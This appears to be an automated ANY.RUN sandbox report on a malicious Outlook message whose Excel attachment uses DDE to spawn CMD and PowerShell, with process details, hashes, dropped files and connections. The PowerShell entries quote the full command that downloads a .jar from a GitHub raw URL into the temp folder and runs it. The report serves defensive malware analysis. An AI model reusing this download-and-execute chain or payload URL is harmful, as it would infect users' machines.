File name: Administrator Notification_ Redirecting email with malware.msg

Full analysis: https://app.any.run/tasks/23bd7236-6071-4343-8ae5-1fc5385e8882
Verdict: Malicious activity
Analysis date: October 09, 2019, 13:08:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5: C4F4B9B591B8F72A0933E2A980858774
SHA1: 6E43807CCA6B51F6FFBD8D4BF5D79237D226E5F6
SHA256: 30E3C0EB8A405B523C59E11E89FFD17C643AFDA375839C985013EAA1F4B20CD1
SSDEEP: 3072:9AEgTcrQVr9O5w52Ai6LXqOnFQi+BHDDD3r:CcMVh5iyXqOqiiDDDb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Starts CMD.EXE for commands execution
      • EXCEL.EXE (PID: 2572)
    • Unusual execution from Microsoft Office
      • EXCEL.EXE (PID: 2572)
    • Executes PowerShell scripts
      • CMD.EXE (PID: 3084)
  • SUSPICIOUS
    • Reads Internet Cache Settings
      • OUTLOOK.EXE (PID: 2816)
    • Starts Microsoft Office Application
      • OUTLOOK.EXE (PID: 2816)
    • Creates files in the user directory
      • OUTLOOK.EXE (PID: 2816)
      • powershell.exe (PID: 3720)
    • Executes JAVA applets
      • CMD.EXE (PID: 3084)
  • INFO
    • Reads Microsoft Office registry keys
      • EXCEL.EXE (PID: 2572)
      • OUTLOOK.EXE (PID: 2816)
    • Dropped object may contain Bitcoin addresses
      • OUTLOOK.EXE (PID: 2816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
All screenshots are available in the full report
Total processes: 38
Monitored processes: 5
Malicious processes: 3
Suspicious processes: 0

Behavior graph

start → outlook.exe → excel.exe (no specs) → cmd.exe (no specs) → powershell.exe, javaw.exe (no specs)

Process information

PID: 2816
CMD: "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg"
Path: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Outlook
Version: 14.0.6025.1000

PID: 2572
CMD: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Parent process: OUTLOOK.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Version: 14.0.6024.1000

PID: 3084
CMD: CMD.EXE /c powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" %tmp%\\I52tGC.jar\") }" & %tmp%\\I52tGC.jar
Path: C:\Windows\system32\CMD.EXE
Parent process: EXCEL.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3720
CMD: powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" C:\Users\admin\AppData\Local\Temp\\I52tGC.jar\") }"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: CMD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2760
CMD: "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\I52tGC.jar"
Path: C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
Parent process: CMD.EXE
User: admin
Company: Oracle Corporation
Integrity Level: MEDIUM
Description: Java(TM) Platform SE binary
Exit code: 0
Version: 8.0.920.14
Total events: 2 730
Read events: 2 207
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 3
Text files: 27
Unknown types: 2

Dropped files

PID: 2816 | Process: OUTLOOK.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR2D9E.tmp.cvr
Type: (not identified)
MD5: (not available)
SHA256: (not available)

PID: 2816 | Process: OUTLOOK.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~DF7E6FE25C82C6FF11.TMP
Type: (not identified)
MD5: (not available)
SHA256: (not available)

PID: 2816 | Process: OUTLOOK.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Siparis (2).xls\:Zone.Identifier:$DATA
Type: (not identified)
MD5: (not available)
SHA256: (not available)

PID: 2572 | Process: EXCEL.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRABE6.tmp.cvr
Type: (not identified)
MD5: (not available)
SHA256: (not available)

PID: 3720 | Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYEKY07DS0869C5OM41U.temp
Type: (not identified)
MD5: (not available)
SHA256: (not available)

PID: 2816 | Process: OUTLOOK.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm
Type: pgc
MD5: 74BCA61AB8ED1FA6A3BAFD9A9FCEA026
SHA256: 270729F05C7ADE676E89FBD74210D16D8211CFB7CA10E48996E8CB44D179D4DA

PID: 3720 | Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: A670ADD3BF0A1901BD12CC7C4CD70086
SHA256: 98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986

PID: 2816 | Process: OUTLOOK.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Selam ACIL KONTROL EDIN .msg
Type: msg
MD5: 1DD951854BB96C71428C29BFF63EF7F1
SHA256: AB45E257547AE621F3EAF931592BA439F2AD2DAE46A82D0C945E87B25DE0F2F6

PID: 2816 | Process: OUTLOOK.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_2E25B9F57B733D4499A493454E0F3809.dat
Type: xml
MD5: EEAA832C12F20DE6AAAA9C7B77626E72
SHA256: C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16

PID: 2816 | Process: OUTLOOK.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Siparis (2).xls
Type: text
MD5: 3A8487DA8953DE0A886EC784F2AC5941
SHA256: E0DE585E7C5270C7F36AFC2F013AA5DF64EC507F67C15C912C23B0ACF0EE4845
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 2
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3720 | powershell.exe | 151.101.0.133:443 | raw.githubusercontent.com | Fastly | US | malicious
2816 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted

DNS requests

Domain | IP | Reputation
config.messenger.msn.com | 64.4.26.155 | whitelisted
raw.githubusercontent.com | 151.101.0.133, 151.101.64.133, 151.101.128.133, 151.101.192.133 | shared

Threats

No threats detected
No debug info